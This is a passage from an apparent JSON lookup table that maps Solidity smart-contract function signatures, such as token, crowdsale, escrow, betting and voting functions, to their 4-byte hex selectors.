"getLandPrice(int32,int32)": "0xab07f054", "getPayouts(int32,int32)": "0x301fdb54", "doPayouts(uint256[49],address[49],uint256)": "0x8c9515ea", "buyLand(int32,int32)": "0x38e998a7", "activateZone(int32[],int32[],uint8[],uint8[])": "0x6eebb73f", "_activateZoneLand(int32,int32,uint8,uint8)": "0x8f6a3deb", "getRegionPrice(uint16)": "0x301f2dac", "transferRegion(uint16,address)": "0xcaf798d7", "takeRegion(uint16)": "0xb5dcbb69", "completeRegionAuction(uint16)": "0x2ce2d7c0", "makeBid(uint16)": "0x51c03b85", "regionExists(uint16)": "0xd5a506d0", "addRegion(uint16,uint256,string)": "0x792a152d", "setRegionPrice(uint16,uint256)": "0xeb0bfa38", "setAllowSellLands(uint16)": "0x60bd409e", "setRegionOnSale(uint16)": "0x969bece3", "setRegionName(uint16,string)": "0x6b55264d", "setRegionTax(uint16,uint8)": "0xe850efaf", "setMinMargin(uint256)": "0x2cc27341", "setMapMaster(address)": "0xb43d9ede", "withdrawalAll()": "0xf44b79b3", "JUNE()": "0xccf1e80b", "IraPid()": "0xabfea3c5", "removeAds(address)": "0x4d053af6", "setBillboard(string)": "0xaca8e9dd", "getBillboard(address)": "0x79362167", "DUOLINGO(uint256,string,string,uint256)": "0xa905f4c0", "Mybalance()": "0x5cd9814f", "getMeTokens(uint256)": "0x2204ef4b", "YioCoin()": "0x220d5d8d", "Xingqiub()": "0x713a7eef", "tokensDrukker(address,uint256)": "0x87e6835f", "Zchain()": "0xcf195101", "_transferFallback(address,uint256,bytes)": "0x43ee67cf", "updateBillionsCoinsRemainingToDrop()": "0x9982e7ed", "withdrawBillionsCoins()": "0xcd2a68e5", "BillionsToken()": "0xe962867d", "TestOneToken(string,uint8,string)": "0xa001ef87", "TeaToken()": "0x15d9aefd", "getDrawBlockNumberByWinner(uint256)": "0x21217668", "getSeedByWinner(uint256)": "0x1936a8cd", "draw(uint256)": "0x3b304147", "stopReceiveTicket(uint256)": "0x32227425", "blacklistUserForTransfers(address)": "0x260d387b", "whitelistUserForTransfers(address)": "0xfb37baa1", "setWhitelistedOnly(bool)": "0xa157696b", "isUserAllowedToTransfer(address)": "0xa25b9384", "updateTokenInfo(string,string)": "0x2f71d022", "updateTotalSupply(uint256)": "0x66d49bab", "BroToken()": "0x1a0f2f5f", "whatIsCurrentCap()": "0xa9457d9c", "setDividendFee(uint256)": "0x640bdd70", "setInvestorsPercentage(uint256)": "0x8fab0549", "setOwnerPercentage(uint256)": "0x393b011c", "activatePackage(uint256)": "0x8fc01623", "deactivatePackage(uint256)": "0x3b95f23e", "distributeFees(uint256)": "0x6029bf9f", "buyInvestmentPackage(uint256)": "0x88cbc84a", "getAllInvestmentPackageIds()": "0xc614b522", "getMyInstancesOfAPackage(uint256)": "0xa01a4cfa", "getAllMyPackageIds()": "0xc319618f", "getInvestmentPackageInformation(uint256)": "0xa9c4429a", "removeInvestmentPackage(uint256)": "0xb21089dc", "addInvestmentPackage(string,uint256)": "0x163fa8af", "getTestFour()": "0x7ca01b2a", "getTestThree()": "0x86d08447", "getTestTwo()": "0x8fedd2f2", "getTestOne()": "0xb47e4c6c", "Holahop()": "0xed4f415e", "killItWithFire()": "0xebc824a2", "modifyQuanticCloudIOTData(uint256,uint256)": "0xa89004c5", "detangleQuanticCloudIOTData()": "0x9ba319bf", "entangleQuanticCloudIOTData(uint256)": "0x67b07d48", "SupremIOTToken(address)": "0x070bc508", "RocketCoin()": "0x0884e5d6", "lxhcoin4()": "0x66e99a11", "PutinCoin()": "0x4ad447ba", "SogetiCoin()": "0x7a9ee2dc", "EtherRoyalToken()": "0x937b19ef", "DylanCoin(uint256,string,string)": "0xb9478ade", "vestingIsCompleted(address,uint256)": "0xff7e5abd", "checkRelease(address,uint256)": "0xfd27ce93", "vestToAddressEx(address,uint128,uint8,uint32)": "0xcadb5236", "vestToAddress(address,uint128)": "0x73671268", "CGENToken(uint256)": "0x49a9d5ad", "witness(bytes32,bytes32,bytes32,bytes32,uint8,bytes32,bytes32)": "0xdf11d258", "confirm(bytes32,bytes32,bytes32,uint8,bytes32,bytes32)": "0x2c887399", "setReserveAddress(address)": "0x14673d31", "setValidPriceDurationInBlocks(uint256)": "0x74daf5cc", "setCompactData(bytes14[],bytes14[],uint256,uint256[])": "0x64887334", "Pricing(address)": "0x8aa978be", "VolumeImbalanceRecorder(address)": "0x2f635c6a", "withdrawEther(uint256,address)": "0xce56c454", "removeOperator(address)": "0xac8a584a", "addOperator(address)": "0x9870d7fe", "removeAlerter(address)": "0x01a12fd3", "addAlerter(address)": "0x408ee7fe", "claimAdmin()": "0x77f50f97", "transferAdmin(address)": "0x75829def", "PermissionGroups()": "0x5f8cf7c5", "setQuantityFactor(uint256)": "0x7658c574", "nodeRegistration()": "0x02258730", "hasNextSeedHashB()": "0xfe6a0cd6", "funeral(bytes32,int256)": "0xe5e123f1", "birth(bytes32)": "0xd6be6bd5", "maxNumBets()": "0xc3f3b854", "outstandingPayouts()": "0xbfc7952f", "totalBets()": "0xbefa1e2f", "oldestGen()": "0xbc87b70f", "minWager()": "0xbb9c3f2b", "nextSeedHashB()": "0xb66578dc", "investorProfit()": "0xb52b925d", "toContractDie(bytes32,bytes32,uint256)": "0x97a33431", "isInvestorLocked()": "0x8d0eda03", "nextSeedHashA()": "0x8a2418ab", "profit()": "0x66d16cc3", "nextGen()": "0x63e16fff", "investorBankroll()": "0x607eaf70", "hasNextSeedHashA()": "0x4263ed83", "toDie(bytes32)": "0x203967a5", "investor()": "0x1e0018d6", "seedSourceA()": "0x176b63f4", "funeralAndBirth(bytes32,int256,bytes32)": "0x10ec5d2c", "bankroll()": "0x0c657eb0", "seedSourceB()": "0x0bbaa27a", "withdrawFee()": "0xe941fa78", "withdrawAll()": "0x853828b6", "getCapital(uint256)": "0x29560980", "frequency()": "0xead50da3", "heartbeatCount()": "0xaf3309d8", "lastHeartbeat()": "0x69c1a712", "aliveSince()": "0x38960027", "transfer(address,uint256,bool)": "0xe1ad1162", "_internalTgeSetLive()": "0xce7a0697", "_mint(int256,uint256,uint256,uint256)": "0x11ae6aee", "_finishTge()": "0xbe597faa", "tgeNextPartInvestor()": "0x94d702a4", "tgeCurrentPartInvestor()": "0xb797b5ba", "isLive()": "0xb8f7a665", "tgeStageBlockLeft()": "0x6e88b4ef", "executeSettingsChange(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xc6677519", "withdrawFrozen()": "0x47f7d412", "multiTransfer(address[],uint256[])": "0x1e89d545", "tgeSetLive()": "0x9d0714b2", "Token(address,address)": "0x292f4a6e", "approve_fixed(address,uint256,uint256)": "0x57ebc286", "add(uint256,uint256)": "0x771602f7", "sub(uint256,uint256)": "0xb67d77c5", "div(uint256,uint256)": "0xa391c15b", "mul(uint256,uint256)": "0xc8a4ac9c", "nodeFee()": "0xf4162530", "getNodeHash(address)": "0xdc29da22", "enableNodeRegistration()": "0xd1a132f9", "getNodeStake(address)": "0xcfbf92a9", "getNodeEnabledStatus(address)": "0xc886594d", "nodeAddresses(uint256)": "0xc4d77090", "nodeRegistrationEnabled()": "0xaba222ed", "enableNode()": "0x9ced5c29", "nodeCount()": "0x6da49b83", "getStakeLockedStatus(address)": "0x56a49b7a", "nodeCost()": "0x31deb7e1", "disableNodeRegistration()": "0x1a6f1974", "nodes(address)": "0x189a5a17", "moderators(address)": "0x14d0f1ba", "getNodeAddress(address)": "0x11f217c7", "goLive()": "0x2c28f579", "revealHash(uint256,uint256,bytes4)": "0xfd812e7c", "iWannaLiveForever()": "0xcf81f24d", "abortInactiveFight(uint256)": "0xca79f967", "startFightB(uint256,uint256,bytes4)": "0xba5abaf8", "startFightA(uint256,uint256,bytes4)": "0xb8b52652", "recoverCat(uint256)": "0x8939f5f6", "wantsToFight(uint256,uint256)": "0x6f42879f", "disableNode()": "0xbaf3ef13", "withdrawStake()": "0xbed9d861", "setFinished()": "0x64f65cc0", "setLive()": "0xb98de7c7", "isPermitted(address,bytes32)": "0xe21c4783", "setPermission(address,bytes32,bool)": "0x3b424f09", "selfdestruct(address)": "0xcfc72007", "selfdestruct()": "0x679d38e0", "recoverEth()": "0xbcdb446b", "regainEther()": "0x23350e4a", "suicide(address)": "0xdbc1f226", "bringCat(uint256)": "0xfc6b72b6", "catOwners(uint256)": "0xc27a74d0", "releaseDate()": "0xb9e3e2db", "depositClient()": "0xe9884b44", "bilateralCancelOrder(bytes32)": "0x8b0254b6", "cancelOrder(bytes32)": "0x7489ec23", "completeOrder(bytes32,uint256)": "0x5c69d5d6", "order(bytes32,uint256,uint256)": "0x84a2f00b", "shutdownMarket(bytes32)": "0xc2299e33", "changeTolerance(bytes32,uint256)": "0xbc3bc814", "changeStakeRate(bytes32,uint256)": "0xce799b0a", "changeMinStake(bytes32,uint256)": "0x7727c9ad", "changePrice(bytes32,uint256)": "0xdabd2eb2", "addMarket(uint256,uint256,uint256,uint256)": "0x941b0161", "MarketStake(address,address,address,address)": "0x0e153d48", "AragonTokenSaleTokenMock(address,uint256)": "0xe615ed91", "resetBet()": "0x43146f36", "getAmount()": "0xd321fe29", "Betting(uint256,uint256)": "0x66d42b3f", "CheckBalance(address)": "0x2e4d59c4", "WithdrawFunds()": "0x4c0aac9a", "escrowDecision(uint256,uint256)": "0x9b850322", "EscrowEscalation(uint256,uint256)": "0x3c5192b7", "sellerRefund(uint256)": "0x8e94a5f3", "buyerFundRelease(uint256)": "0xd73b0cf2", "checkStatus(address,uint256)": "0x77db5206", "escrowHistory(address,uint256,uint256)": "0xbdbbf429", "SellerHistory(address,uint256,uint256)": "0x07023a38", "buyerHistory(address,uint256,uint256)": "0x21027354", "getSpecificTransaction(address,uint256,uint256)": "0x64d03095", "getNumTransactions(address,uint256)": "0xa6a3a439", "newEscrow(address,address,bytes32)": "0xda1070da", "getEscrowFee(address)": "0x64fa3070", "setEscrowFee(uint256)": "0x14081e39", "EscrowMyEther()": "0x2f1af169", "TeamTokensHolderMock(address,address,address)": "0x8a53c3b1", "setValue(string)": "0x93a09352", "funcArrayInArguments(address[],address[])": "0x278d6e5b", "funcArrayInArguments(address[])": "0x0fd2ce17", "ArrayTypesTest(uint256[10])": "0xe26f0342", "setPublic(uint256)": "0x31845f7d", "getPublic()": "0x2c044779", "setPrivate(uint256)": "0x89cfd71b", "getPrivate()": "0x9ad55220", "DummyContract(uint256,uint256,uint256[10])": "0x51bdf229", "removeClaim(address,address,bytes32)": "0xc7508ec7", "getClaim(address,address,bytes32)": "0xe1661eff", "setSelfClaim(bytes32,bytes)": "0xe648ce75", "setClaim(address,bytes32,bytes)": "0x77640f9c", "test_method_increaseTimeBy30000()": "0x1f99d862", "before_test_method_increaseTimeBy30000()": "0x9d22c693", "test_method()": "0x60214c6f", "before_test_method()": "0x3949630e", "get(bytes32,address,address)": "0x447885f0", "set(bytes32,address,bytes32)": "0xd79d8e6c", "verifier()": "0x2b7ac3f3", "refundBroadcaster(uint256)": "0x40cd988d", "isClaimSegmentVerified(uint256,uint256,uint256)": "0x71d6dbe1", "getClaim(uint256,uint256)": "0x427a2fc2", "getJob(uint256)": "0xbf22c457", "jobStatus(uint256)": "0xa8e5e219", "distributeFees(uint256,uint256)": "0x7e69671a", "doubleClaimSegmentSlash(uint256,uint256,uint256,uint256)": "0x64d563f1", "missedVerificationSlash(uint256,uint256,uint256)": "0xc8e8f487", "batchDistributeFees(uint256,uint256[])": "0x8978fc79", "invokeVerification(uint256,uint256,uint256,string,bytes32[2])": "0x11db3be7", "verify(uint256,uint256,uint256,string,bytes32[2],bytes,bytes)": "0x5a40ec7e", "claimWork(uint256,uint256[2],bytes32)": "0x3ffe5eb7", "job(string,string,uint256,uint256)": "0x307c6f8e", "setFinderFee(uint256)": "0xbe427b1c", "setDoubleClaimSegmentSlashAmount(uint256)": "0x7d6ebe94", "setMissedVerificationSlashAmount(uint256)": "0x0cb335c4", "setFailedVerificationSlashAmount(uint256)": "0x71af5d0e", "setVerificationSlashingPeriod(uint256)": "0x4e78e0c2", "setVerificationPeriod(uint256)": "0x09bc1812", "setVerificationRate(uint64)": "0x15fa168a", "JobsManager(address)": "0xb358e375", "makeUser(address,string,string)": "0xca0a9c2d", "Group(string)": "0x9a314b8e", "EtherBank()": "0x4d909110", "get_table_size(uint256)": "0x8391a1c4", "get_data(uint256,uint256)": "0x90d240c6", "get_header(uint256,uint256)": "0xa6c2591e", "update(uint256,uint256,bytes32,bytes32)": "0xb10f8583", "insert(uint256,bytes32,bytes32)": "0xce4efe62", "create(bytes32,bytes32,bytes32)": "0x5abc3339", "get_database_id()": "0x699ffd88", "get_data_item()": "0xeb2cf098", "search_data()": "0xfc23466d", "update_data()": "0xc79f5321", "erase_data()": "0xbe692cd3", "insert_data()": "0xd902ac2e", "create_table()": "0xfc99342e", "create_all()": "0xcdc68b85", "set_BCDB_contract()": "0x62d0af7a", "getByMesa(uint256,uint256,uint256)": "0x61cdb1d7", "getBySchool(uint256,uint256)": "0x98dedf30", "getByDistrict(uint256)": "0x5def5814", "setData(uint256,uint256,uint256,uint8[])": "0x700e17b5", "getTotal()": "0x775a25e3", "init(bytes32[])": "0x3368e968", "test_YayIsNotOverSixtyPercent()": "0xf77e4d8b", "test_YayIsOverSixtyPercent()": "0x7b9c5794", "checkMilestones(address[],uint256[])": "0x29991a5b", "PowerEvent(address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,address[],uint256[])": "0xefac0fd0", "getScriptExecutor(bytes)": "0x04bf2a7f", "disableScriptExecutor(uint256)": "0x5ca4d4bb", "addScriptExecutor(address)": "0x87a16f12", "unlock2Y()": "0xe5494be1", "unlock1Y()": "0x38c80857", "add2Y(address,uint256)": "0x9f22af8e", "add1Y(address,uint256)": "0x65121f68", "addRemainingTokens()": "0xe9d7f309", "LockedTokens(address)": "0xa26bddb4", "TheOneToken()": "0x7bea7112", "doWorkAndPayEBT()": "0x3cd260e6", "doWorkAndPayEAT()": "0x995cb4ec", "doWorkAndPayTOT()": "0x548fe136", "testingContracts()": "0x1eab0a95", "getSubscriptionServiceId(bytes32)": "0xd575af74", "makeSubscriptionId(address,uint256)": "0x9871e4f2", "addService(string,string,int256,uint256,uint256)": "0xedfbf9cf", "calculateTokenAmount(uint256)": "0xa24bcf46", "PricingStrategy(uint256,uint256,uint256,uint256)": "0x0187e973", "PapyrusToken(address[],uint256[])": "0xa25401ea", "isPartner(address,address)": "0x4affb863", "dissolve(address)": "0xefe9b08d", "repayLoan(address,uint256)": "0x93a595f5", "distributeEvenly(uint256)": "0x7983eb31", "distribute(address,uint256)": "0xfb932108", "cancelTransaction(bytes32)": "0x70ba3339", "proposeTransaction(address,uint256,bytes,string)": "0xc074a27e", "Partnership(address[],uint256)": "0x1b7b7c3d", "changeTime(uint256)": "0x7974f8fe", "currentTime()": "0xd18e81b3", "cancelInvoice(uint256)": "0xda9c273d", "payInvoice(uint256)": "0xac60a6cd", "EthlanceInvoice(address)": "0x01e6a70e", "transferTo(address,uint32)": "0xccb767ae", "issue(address,uint32)": "0x3284fd79", "SimpleCoin()": "0x0f527200", "receiveTransfer(address,uint256,address,bytes)": "0xb8b7b899", "getSignedPublicEncKey(address)": "0xfbf3c88d", "setSignedPublicEncKey(string)": "0x738b2fac", "inboxSize(address)": "0xdc8d2696", "inboxIsEmpty(address)": "0xa73d907e", "consumeMsg()": "0xee25f580", "getMsg(address)": "0x428e2d64", "MsgEngine(uint8)": "0xc61efde6", "InteractingTokenA(uint256,uint256)": "0xbced2c8c", "getInvoice(string)": "0xf906a440", "sendInvoice(string,string,string,string)": "0x59a765f9", "canUpdateCompanyPreferences(string,address)": "0xf5a9e21f", "canUpdateInvoicingAddress(string,address)": "0x8c561592", "canUpdateCompany(string,address)": "0xbd6bf475", "getCompanyPreferences(string)": "0x51a3aed5", "updateRoutingPreference(string,string)": "0x13dce04f", "getInvoicingAddressByIndex(string,uint256)": "0x89b38d2f", "getInvoicingAddressCount(string)": "0x23807da8", "createInvoicingAddress(string,string)": "0x0df76370", "createCompany(string)": "0xfd7f611e", "getVatIdByAddress(string)": "0x885819c2", "hasCompany(string)": "0x24f55e29", "EInvoicingRegistry()": "0x9f6ff2e1", "STQPreICO3TestHelper(address,address)": "0x8c26c937", "capacity()": "0x5cfc1a51", "statusPred(address,uint256[],uint256)": "0x4acdd29a", "getStatus(address,uint256)": "0x4ce0ef95", "setInvoiceCancelled(address,address,uint256)": "0xdf43b699", "setInvoicePaid(address,address,uint256,uint256)": "0x10950708", "getFreelancer(address,uint256)": "0x22b524fe", "getAmount(address,uint256)": "0xe0b999a1", "getContract(address,uint256)": "0xaad55726", "test_transfer_to_contract_without_fallback()": "0xcbb45444", "test_transfer_to_contract_with_fallback()": "0xdad30cfc", "isTradingOpen()": "0x56a060a2", "getMembershipExpiryDate(address)": "0x10875ac0", "registerNewMember(address,uint256)": "0x41c6f609", "extendMembership(address,uint256)": "0x02ba742b", "enroll(address,uint256)": "0x6111ca21", "addRegistrar(address,string)": "0x8e3d5303", "ExpiringMembership()": "0x2a2ad4df", "removeRole(address,string)": "0x1bfe0308", "addRole(address,string)": "0x7d72aa65", "hasRole(address,string)": "0x217fe6c6", "checkRole(address,string)": "0x0988ca8c", "rand(uint256,uint256)": "0x95032b62", "stringsEqual(string,string)": "0x13d19950", "getCurrentSolver(address)": "0x26052ef6", "receiveIndex(uint256,uint256,uint256,uint256,bool)": "0x49ca30ab", "requestIndex()": "0x420714bd", "compareResults()": "0xc10efd2f", "receiveResults(string,uint256)": "0x042e58c8", "executeComputation()": "0x0466c7ab", "requestComputation(string,string,uint256,uint256)": "0x719591c7", "disableService()": "0xcba58ab6", "enableService()": "0x024fcc6c", "checkTime(bytes32,bytes32,uint256)": "0x9c66452e", "getOraclizePolicyId(bytes32)": "0x59f02c4d", "getOraclizeCallback(bytes32)": "0x7f205c8c", "test_set_get_OraclizeCallback()": "0xfa1bde89", "test_set_get_Policy()": "0x6f47b075", "test_set_get_PremiumFactors()": "0xb26e4aed", "SpreadToken()": "0xf354040c", "_bill_all_participants()": "0xea0d0015", "clear_market()": "0x45ef8217", "post_energy_balance(int256)": "0x79f1433c", "remove_participant()": "0x68d155a0", "add_participant()": "0xadf0c351", "getDisapprovalsFor(address)": "0xef2bd19e", "undisapprove(uint256)": "0x2206e837", "disapprove(address)": "0x15770d99", "getApprovalsFor(address)": "0x5d8ca2ac", "unapprove(uint256)": "0xfd3f1a04", "MyOwned()": "0x2db59e2b", "requireTokenFuel()": "0xf2c3e6d9", "supplyFuel(uint256)": "0xa918c09c", "returnInvestment()": "0x40ac89a2", "acceptSale()": "0x40b6290f", "refuseSale()": "0xb08c9bd1", "cancelSale()": "0xe7e10490", "refuseInvestment()": "0xfcc36c49", "cancelInvestment()": "0x94f8e954", "withdrawTokens(address,uint256)": "0x06b091f9", "makeAvailable()": "0xad32f925", "isDelayed()": "0x4fa20a52", "agreeNeg(string,uint256)": "0x5aa97a3b", "recieveNegReq(uint256,uint256,uint256,uint256,string)": "0x000f71f8", "sendNegReq(uint256,uint256,uint256,string)": "0xf44f8be9", "dealBuyContract(uint256,uint256,string,uint256,uint256,string)": "0xff4bd173", "dealSellContract(uint256,string,uint256,uint256,string)": "0xa09a1e22", "delListReq(string,uint256,uint256)": "0xcfe1887b", "updateListReq(uint256,uint256)": "0x92dd1246", "listRequire(string,uint256,uint256,uint256)": "0x1ee44a5e", "freeze(uint256,uint256)": "0x35d7a052", "getAvailableAmount(uint256)": "0xd5c14391", "getReceiptAmount(uint256)": "0x84afaa7c", "CreateRecipt(string,uint256,string,string,string,string,string,uint256)": "0xaea197fe", "User(address,address,address)": "0x81c4e1c8", "setSettings(uint256)": "0x7cd6a7fd", "contractorTransferFrom_Scoupon(address,address,uint256)": "0x3eda7b88", "contractorTransfer_Scoupon(address,uint256)": "0xc6570e67", "contractorTransferFrom_Bcoupon(address,address,uint256)": "0x9348b810", "contractorTransfer_Bcoupon(address,uint256)": "0x22f6fa7a", "setContractorImpl(address)": "0x0e388774", "getBalanceOfResidualBcoupons()": "0xc26298a7", "getScouponBalances(address)": "0xdbddcdb7", "getBcouponBalances(address)": "0x79a9f14d", "setScouponTransferCost(uint256)": "0x0ca35c22", "getScouponTransferCost()": "0x09ed5673", "setBcouponTransferCost(uint256)": "0xf951410d", "getBcouponTransferCost()": "0x33e11ec4", "setScouponAllocationFactor(uint256)": "0xf9586eaa", "getScouponAllocationFactor()": "0x8d6b5d3e", "setBcouponAllocationFactor(uint256)": "0x98d0a6c7", "getBcouponAllocationFactor()": "0x520282d0", "getTokenBalances(address)": "0x764f3aa8", "setCouponMulFactor(uint256)": "0x8b2ae073", "getCouponMulFactor()": "0x3fb97857", "allowanceBcoupons(address,address)": "0xbad568b1", "approveScoupons(address,uint256)": "0x8d0716c4", "approveBcoupons(address,uint256)": "0xa34e9e66", "transferResidualScoupons(address,uint256)": "0x07d4db39", "transferResidualBcoupons(address,uint256)": "0x14930d7e", "transferScoupons(address,uint256)": "0xbd4b6bbd", "transferBcoupons(address,uint256)": "0x8318e40b", "accept_B_coupons(address,uint256)": "0x9ab1416c", "createCoupons(uint256)": "0x959ca192", "FedCoup()": "0xdfbde5a7", "Token(address,string,string)": "0x9cdf4dd3", "CentralizedOracle(address,bytes)": "0x1dacad8a", "test_withAssertTrue()": "0x4e76a725", "test_fourInvalidFalseEqLog()": "0x47eed11e", "test_threeInvalidFalseEqLog()": "0xaef1b9b5", "test_twoInvalidFalseEqLog()": "0x505e71d0", "test_oneInvalidFalseEqLog()": "0x5473c701", "test_oneInvalidFalseEq()": "0xe62cd55c", "test_fourValidEqBool()": "0x9a4cd266", "test_threeValidEqBool()": "0x1281d056", "test_twoValidEqBool()": "0x9f8f0dc3", "test_falseEqNoLog()": "0x786d8a25", "test_oneValidEqBool()": "0xec2af44d", "getResolver()": "0xa9dc491d", "terminate(uint256)": "0x7a828b28", "updateRent(uint256)": "0xeb9220ab", "pay(uint256,uint256)": "0xef48eee6", "Property(string,string,uint256,uint256)": "0x2b5da915", "getPropertyRatingTuple()": "0xe690833a", "getOwnerRatingTuple()": "0x7817abee", "getPropertyRating()": "0x83fcf308", "getOwnerRating()": "0x5bae4e98", "getLongitude()": "0x55b72f38", "getLatitude()": "0xae7b6bd9", "rateProperty(uint256)": "0x39c0ea6e", "rateOwner(uint256)": "0x88968b94", "rateTenant(uint256)": "0x6e9c4d0a", "setGovernment(address)": "0x0f4b1cfc", "isValid(string,string,uint256,uint256)": "0x6ed40f9d", "addEjariRule(string,string,uint256,uint256)": "0x56104861", "EjariRules()": "0xda0a599e", "register(uint8)": "0x61d689fa", "addThing(bytes32,string,bytes32,string)": "0xadaaa1e1", "Expensive()": "0x18f839bd", "reserveAll()": "0xe173b0d0", "removeFromInitialSupply(uint256)": "0xd10c3d1d", "addInInitialSupply(uint256)": "0x9135ac08", "EBLCreation(uint256,string,string)": "0xf83629e0", "BiTianToken()": "0xf85f8a3a", "initialFrozenTime()": "0xac3d5084", "releaseBasicAccount()": "0xfbb26d00", "InitialBasicBalance()": "0x4c3dff01", "ERC20(uint8)": "0x995783d9", "releaseFrozenBalance()": "0xcc755b70", "getFrozenBalanceByAddress(address,address)": "0xf225415a", "getAvailableBalanceByAddress(address,address)": "0x68503cdf", "getInitialBalanceByAddress(address,address)": "0xc47c4cc7", "getTotalFrozenBalance()": "0x547fd950", "initialPartnerAccount(uint8)": "0x72e91fee", "initialInvestorAccount(uint8)": "0xdf79d8fa", "initialEcologyAccount(uint8)": "0xd9da486a", "initialCreatorAccount(uint8)": "0x3e7e42fa", "BasicAccountInfo(uint8)": "0x90a59ea1", "pollBallot(uint256,uint256)": "0x91854684", "pollTitle(uint256)": "0x327f0b6b", "poll(uint256)": "0x3d955aa3", "nPolls()": "0x7c5c2cef", "unvote(uint256)": "0x51ec4285", "vote(uint256,uint256[])": "0x7055d368", "cancelPoll(uint256)": "0xd0ec1607", "updatePollDescription(uint256,bytes,uint8)": "0x59fe2720", "addPoll(uint256,uint256,bytes,uint8)": "0x2cca179d", "addPoll(uint256,bytes,uint8)": "0xa63744e0", "SrcToken()": "0x435010d8", "hostileTakeover(address,uint256)": "0xa66939ad", "modSymbol(string)": "0x6e997972", "modName(string)": "0x6520768d", "transferMod(address)": "0x8a74f69d", "ENTS()": "0x0fc55d1e", "get_eth()": "0x22d34212", "set_rand_addr(address,uint256)": "0x1c30549f", "FreeLove()": "0x001db74d", "QCSTToken()": "0xe4a0c124", "setInvestorsStorage(address)": "0xed2de952", "setRevolution(address)": "0xf9fd41d8", "settleBet(bytes32)": "0x675f6537", "getDiceWinAmount(uint256,uint256,bool)": "0x34bb447f", "genRandomArray(uint256,uint256,uint256)": "0x57901b19", "getIdxArray(uint256)": "0x150c3e8b", "getHash(uint256[])": "0x6e82e86a", "copy(uint256[],uint256)": "0x0307acae", "removeByIdx(uint256[],uint256)": "0xc52c936c", "mulRate(uint256,uint256)": "0xee7fc5a3", "pwrFloat(uint256,uint256,uint256,uint256)": "0x3ca805ba", "convertToMini(uint256)": "0x5f493f63", "setAllowanceBeforeWithdrawal(address,address,uint256)": "0x3a45d3ef", "setWithdrawRate(uint256)": "0x66272374", "SCE(uint256,string,string)": "0xd3b7ef5e", "tokenAddressToAssetData(address)": "0x72c60b1d", "parseOrder(bytes,address,address)": "0xf5823b0b", "parseSignature(bytes)": "0xf596d10a", "ensureAllowance(address,address,uint256)": "0xabe7f6fe", "registerAssetProxy(address)": "0xc585bb93", "Bluechip()": "0xbb8ab48c", "_ownerReleaseLimit()": "0x36c5bf8c", "withdrawToTeamStep4(uint256)": "0x0ae25ca3", "withdrawToTeamStep3(uint256)": "0x2c868287", "withdrawToTeamStep2(uint256)": "0xa7157c72", "withdrawToTeamStep1(uint256)": "0x39635d13", "withdrawCommonCoin(uint256)": "0x3ef84fcb", "_permittedPartnerTranferValue(address,uint256)": "0x9fdc3255", "partnerWithdrawed(address)": "0xcab37586", "partnerAmountLimit(address)": "0x4fd0fcb6", "privateSaleReleased(address)": "0x08534888", "getPrivateSaleAgentAddresses()": "0x9b9cc2ca", "getPartnerAddresses()": "0xa20ddfb6", "_privateSaleTransferFromOwner(address,uint256)": "0xf86418e5", "withdrawRemainPrivateCoin(uint256)": "0x3b4d75d8", "withdrawPrivateCoinByMan(address,uint256)": "0x951717e2", "privateSale(address)": "0xe7d53fcb", "removeAddressFromPrivateWhiteList(address)": "0x01284ad4", "addAddressToPrivateWhiteList(address,uint256)": "0x4a4ef738", "removeAddressFromPartnerWhiteList(address)": "0x150b52db", "addAddressToPartnerWhiteList(address,uint256)": "0x156014e8", "changeOwnerWallet(address)": "0x18117abb", "swapID(address,bytes32,uint256)": "0x4f0cc59d", "redeemable(bytes32)": "0x68f06b29", "initiatable(bytes32)": "0x09ece618", "refundable(bytes32)": "0x9fb31475", "auditSecret(bytes32)": "0x976d00f4", "audit(bytes32)": "0xc140635b", "redeem(bytes32,bytes32)": "0xb31597ad", "initiate(bytes32,address,bytes32,uint256)": "0x412c0b58", "setCurrency(string,address,address,uint8,bool)": "0x433288a2", "setOgToken(address)": "0xa8e5740c", "reserveManyTokens(uint256[],uint256,address)": "0xd15c82e3", "batchToApplyMilestone(uint8,address[])": "0x71398637", "_setMilestoneTo(address,uint256,uint8)": "0x1ab8bc44", "_checkPolicyEnabled(uint8)": "0x57d786da", "modifyMilestoneFrom(address,uint8,uint8)": "0xb4223757", "ExEquity()": "0x05cd4794", "getOrders(uint256,uint256)": "0x8f72fc77", "ordersCount()": "0x35daa731", "orderDepth(bytes32)": "0xa188fcb8", "FaceWalletToken()": "0xc03951f7", "percentDivider()": "0xfe6f1b05", "AcceessoryWrapper721()": "0x345f58b2", "amountRemaining()": "0xf7ffbd85", "COMMISSION_WALLET()": "0x17c73ff0", "curator()": "0xe66f53b7", "communityTokensHolder()": "0x35b1097e", "addOwner()": "0x1ce26ecd", "fundingAccount()": "0x270bfc07", "_percentSoldInPreICO()": "0x61888b40", "GAS_REFUND()": "0x2b78194f", "returnFrozenFreeFunds()": "0xc84748f9", "developersTokensPercent()": "0x09bc4096", "secondsaleOpen()": "0x78483632", "fourthStageMintingDate()": "0xc978ee59", "mintRate()": "0xca0dcf16", "OSUniEDUSupply()": "0xffbd73d0", "withdraw_amount()": "0x28d0d223", "serviceAccount()": "0x2bb0e10b", "TestX()": "0x3aa7429c", "opetToken()": "0xc7b6ccae", "ecosystemtoken()": "0xe661a98f", "addChunk4ToWhiteList()": "0x658dc76f", "expireAfter()": "0xb7b8533a", "mainSaleTokenRaised()": "0xafa1d6c9", "TOKEN_STARTED()": "0x705791f2", "RealTotalSupply()": "0xba5cb999", "mainContract()": "0xd270e7ab", "JP_winner()": "0x44f84579", "forSell()": "0xff5f1346", "GetPie()": "0xde12b839", "deregister()": "0xaff5edb1", "genWallet()": "0xef38a306", "SALE_CAP_USD()": "0x3994bce4", "preICOTokensAllocated()": "0x7935326b", "pauseCWC()": "0x2d58fab1", "refundEnabled()": "0x4c4a386f", "CRAWDSALE_EARLYBIRD_END_DAY()": "0x4335b046", "totalCapInWei()": "0xcbb05527", "currentTokenSaleId()": "0xe0f0497d", "dateTier3()": "0x5b379044", "withdrawDragonsPrime()": "0x562c45da", "m_ETHPriceLifetime()": "0xbccee504", "dateStart()": "0xa3b6120c", "MAX_CROWDSALE_TIME()": "0x1510ca79", "lockPeriodStart()": "0x7ece75dd", "tokenAirdropLeft()": "0x50fef2e4", "refundCompleted()": "0xa6ca322b", "gameID()": "0xc7dd4b4f", "member()": "0xe3f6b544", "betTotalGasprice_()": "0xff598a06", "initialMarketSales()": "0x9d636359", "START_TGE()": "0x0a834ac0", "previousRoundId()": "0x9e8fcbe9", "BASE_RATE()": "0x41910f90", "MinPayment()": 